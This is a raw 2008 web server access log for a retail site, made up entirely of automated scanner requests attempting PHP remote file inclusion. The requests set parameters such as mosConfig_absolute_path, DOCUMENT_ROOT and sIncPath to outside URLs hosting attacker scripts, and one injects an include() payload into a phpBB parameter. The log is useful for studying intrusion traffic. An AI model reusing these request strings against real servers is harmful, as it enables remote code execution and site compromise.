65.38.169.228 - - [27/Aug/2008:00:34:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:34:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:34:46 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:34:46 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:34:47 -0700] "GET /logs/access_080712.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:34:50 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:35:03 -0700] "GET /logs/access_080812.log//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:35:04 -0700] "GET /logs//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:35:04 -0700] "GET //db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:35:13 -0700] "GET /logs/access_080724.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:35:13 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:35:57 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:35:58 -0700] "GET /logs/access_080724.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:35:58 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:35:58 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:36:19 -0700] "GET /logs/access_080729.log///components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:36:21 -0700] "GET /logs/access_080725.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:36:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:36:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:36:22 -0700] "GET /logs/access_080726.log//?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:36:22 -0700] "GET //?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:36:22 -0700] "GET /logs//?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:36:22 -0700] "GET /logs/access_080806.log//?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:36:24 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:36:26 -0700] "GET /logs/access_080801.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:36:26 -0700] "GET ///components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:36:27 -0700] "GET /logs///components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:36:36 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:37:01 -0700] "GET /logs//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:37:01 -0700] "GET //db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:37:01 -0700] "GET /logs/access_080812.log//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:37:01 -0700] "GET /logs/access_080724.log///components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:37:04 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:37:31 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
81.21.78.60 - - [27/Aug/2008:00:37:47 -0700] "GET /logs/access.log//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:38:59 -0700] "GET /logs/access_080725.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:38:59 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:39:08 -0700] "GET /logs/access.log//db_connect.php?baseDir=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:39:55 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:39:55 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:39:55 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:40:09 -0700] "GET /logs/access_080720.log/errors.php?error=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:40:09 -0700] "GET /errors.php?error=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:40:09 -0700] "GET /logs/errors.php?error=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:41:02 -0700] "GET /logs/access_080627.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
64.22.89.194 - - [27/Aug/2008:00:41:04 -0700] "GET /logs/access_080810.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:41:05 -0700] "GET /logs/access_080627.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:41:25 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:41:25 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:41:34 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:41:34 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:41:34 -0700] "GET /logs/access_080714.log//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:41:38 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:41:38 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:41:39 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:42:05 -0700] "GET /logs/access.log//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:42:06 -0700] "GET /logs/access_080720.log/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:42:06 -0700] "GET /logs/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:42:06 -0700] "GET /errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
84.54.137.9 - - [27/Aug/2008:00:42:57 -0700] "GET /logs/access_080804.log/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
84.54.137.9 - - [27/Aug/2008:00:42:57 -0700] "GET /errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
84.54.137.9 - - [27/Aug/2008:00:42:58 -0700] "GET /logs/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:43:05 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
84.54.137.9 - - [27/Aug/2008:00:43:13 -0700] "GET /logs/access_080703.log/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:44:30 -0700] "GET /logs/access_080720.log//index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:44:30 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
84.54.137.9 - - [27/Aug/2008:00:44:31 -0700] "GET /errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:44:32 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:44:35 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:44:36 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:45:02 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:45:03 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:45:03 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:45:03 -0700] "GET /logs/access_080720.log/errors.php?error=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:45:03 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:45:05 -0700] "GET /errors.php?error=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
69.94.97.157 - - [27/Aug/2008:00:45:11 -0700] "GET /logs/access_080720.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
69.94.97.157 - - [27/Aug/2008:00:45:11 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
69.94.97.157 - - [27/Aug/2008:00:45:11 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:45:51 -0700] "GET /logs/access_080726.log//?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:45:56 -0700] "GET //?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:45:56 -0700] "GET /logs//?sIncPath=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
194.79.75.195 - - [27/Aug/2008:00:46:00 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
194.79.75.195 - - [27/Aug/2008:00:46:00 -0700] "GET //index.php?DOCUMENT_ROOT=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:46:24 -0700] "GET /logs/access_080720.log/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:46:24 -0700] "GET /errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [27/Aug/2008:00:46:24 -0700] "GET /logs/errors.php?error=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:46:39 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:47:11 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:47:36 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:47:36 -0700] "GET /logs/access_080720.log//index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:47:36 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
194.79.75.195 - - [27/Aug/2008:00:47:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.oldfactorymall.com"
194.79.75.195 - - [27/Aug/2008:00:47:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.oldfactorymall.com"
89.218.85.18 - - [27/Aug/2008:00:48:36 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
200.11.67.242 - - [27/Aug/2008:00:48:43 -0700] "GET /logs/access_080724.log//components/com_simpleboard/image_upload.php?sbp=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
200.11.67.242 - - [27/Aug/2008:00:48:44 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
200.11.67.242 - - [27/Aug/2008:00:48:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
200.11.67.242 - - [27/Aug/2008:00:49:33 -0700] "GET /logs/access_080709.log//components/com_simpleboard/image_upload.php?sbp=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:49:36 -0700] "GET /logs/access_080810.log//modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:49:36 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:49:39 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:49:40 -0700] "GET /logs/access_080806.log//modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
69.19.225.130 - - [27/Aug/2008:00:50:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [27/Aug/2008:00:50:05 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [27/Aug/2008:00:50:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:50:15 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
202.89.35.113 - - [27/Aug/2008:00:50:21 -0700] "GET /logs/access_080801.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:51:03 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:51:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:51:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:51:14 -0700] "GET /logs/access.log//admin.php?include_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:51:14 -0700] "GET //admin.php?include_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:51:14 -0700] "GET /logs//admin.php?include_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:51:15 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:51:15 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:51:29 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
